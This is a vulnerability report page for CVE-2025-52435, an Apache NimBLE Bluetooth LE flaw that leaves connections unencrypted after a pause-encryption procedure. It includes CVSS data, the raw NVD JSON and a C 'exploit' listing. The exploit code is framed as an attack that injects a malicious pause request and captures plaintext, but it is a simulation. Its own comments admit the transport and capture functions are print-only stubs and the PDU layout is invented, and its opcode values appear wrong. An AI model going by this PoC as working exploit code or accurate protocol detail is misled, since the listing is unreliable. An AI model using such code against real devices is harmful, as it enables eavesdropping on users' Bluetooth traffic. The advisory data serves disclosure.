Security Vulnerability Report
CVE-2025-52435 CVSS 7.5 HIGH

CVE-2025-52435

Published: 2026-01-10 10:15:50
Last Modified: 2026-01-14 16:30:56

Description

J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE. Improper handling of Pause Encryption procedure on Link Layer results in a previously encrypted connection being left in un-encrypted state allowing an eavesdropper to observe the remainder of the exchange. This issue affects Apache NimBLE: through <= 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:* - VULNERABLE
Apache NimBLE <= 1.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2025-52435 PoC - NimBLE Link Layer Encryption Pause Exploit
 * This PoC demonstrates the encryption pause vulnerability in Apache NimBLE
 * Note: Requires Bluetooth Low Energy monitoring capabilities
 *
 * As published, this listing contains no BLE transport: the functions
 * send_ll_control_pdu() and capture_plaintext_traffic() are called but
 * never defined on the page. Placeholder stubs that only print are
 * supplied below so that the listing compiles; they are not part of the
 * original. The PDU struct is a simulation, not the real Link Layer
 * control PDU layout, and the opcode values are the page's own.
 */
#include <stdint.h>   /* uint8_t, uint16_t */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* sleep() */

// Simulated BLE LL Control PDU structure
typedef struct {
    uint8_t opcode;
    uint8_t conn_handle[2];
    uint8_t* data;
} ll_control_pdu_t;

// Pause Encryption Opcode (0x05) - LL_PAUSE_ENC_REQ/RSP
#define LL_PAUSE_ENC_REQ 0x05
#define LL_PAUSE_ENC_RSP 0x06

// Placeholder stubs (not defined on the page): they only report the call.
static void send_ll_control_pdu(int fd, const ll_control_pdu_t* pdu) {
    printf("[stub] send_ll_control_pdu(fd=%d, opcode=0x%02x) - no transport implemented\n",
           fd, pdu->opcode);
}

static void capture_plaintext_traffic(int fd) {
    printf("[stub] capture_plaintext_traffic(fd=%d) - no capture implemented\n", fd);
}

// Malicious Pause Encryption PDU generator
ll_control_pdu_t* craft_pause_enc_pdu(uint16_t conn_handle) {
    ll_control_pdu_t* pdu = malloc(sizeof(ll_control_pdu_t));
    if (pdu == NULL) {
        return NULL;
    }
    pdu->opcode = LL_PAUSE_ENC_REQ;
    pdu->conn_handle[0] = conn_handle & 0xFF;          // little-endian low byte
    pdu->conn_handle[1] = (conn_handle >> 8) & 0xFF;   // high byte
    pdu->data = NULL;
    return pdu;
}

// Exploit function - sends malicious pause encryption request
int exploit_pause_encryption(int fd, uint16_t conn_handle) {
    printf("[*] CVE-2025-52435: Initiating encryption pause attack\n");
    printf("[*] Target connection handle: 0x%04x\n", conn_handle);

    // Step 1: Inject Pause Encryption Request
    ll_control_pdu_t* mal_pdu = craft_pause_enc_pdu(conn_handle);
    if (mal_pdu == NULL) {
        fprintf(stderr, "[-] allocation failed\n");
        return 1;
    }
    send_ll_control_pdu(fd, mal_pdu);

    // Step 2: Wait for response and capture now-unencrypted traffic
    sleep(1);
    printf("[*] Connection encryption disabled - monitoring plaintext data\n");

    // Step 3: Capture sensitive data from unencrypted connection
    capture_plaintext_traffic(fd);

    free(mal_pdu);
    return 0;
}

int main(int argc, char** argv) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <connection_handle>\n", argv[0]);
        return 1;
    }
    uint16_t handle = (uint16_t)atoi(argv[1]);
    return exploit_pause_encryption(0, handle);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52435", "sourceIdentifier": "[email protected]", "published": "2026-01-10T10:15:50.320", "lastModified": "2026-01-14T16:30:55.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE.\n\nImproper handling of Pause Encryption procedure on Link Layer results in a previously encrypted connection being left in un-encrypted state allowing an eavesdropper to observe the remainder of the exchange.\nThis issue affects Apache NimBLE: through <= 1.8.0.\n\nUsers are recommended to upgrade to version 1.9.0, which fixes the issue."}, {"lang": "es", "value": "Mala configuración de J2EE: vulnerabilidad de transmisión de datos sin cifrado en Apache NimBLE.\n\nEl manejo inadecuado del procedimiento de Pausa de Cifrado en la Capa de Enlace provoca que una conexión previamente cifrada quede en estado sin cifrar, permitiendo a un fisgón observar el resto del intercambio.\nEste problema afecta a Apache NimBLE: hasta la versión 1.8.0 inclusive.\n\nSe recomienda a los usuarios actualizar a la versión 1.9.0, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-5"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:*", 
"versionEndExcluding": "1.9.0", "matchCriteriaId": "DC033019-AA62-465E-AD0A-8018D8C89ED3"}]}]}], "references": [{"url": "https://github.com/apache/mynewt-nimble/commit/164f1c23c18a290908df76ed83fe848bfe4a4903", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/apache/mynewt-nimble/commit/ec3d75e909fa6dcadf1836fefc4432794a673d18", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://lists.apache.org/thread/ow8dzpsqfh9llfclh5fzh6z237brzc0s", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}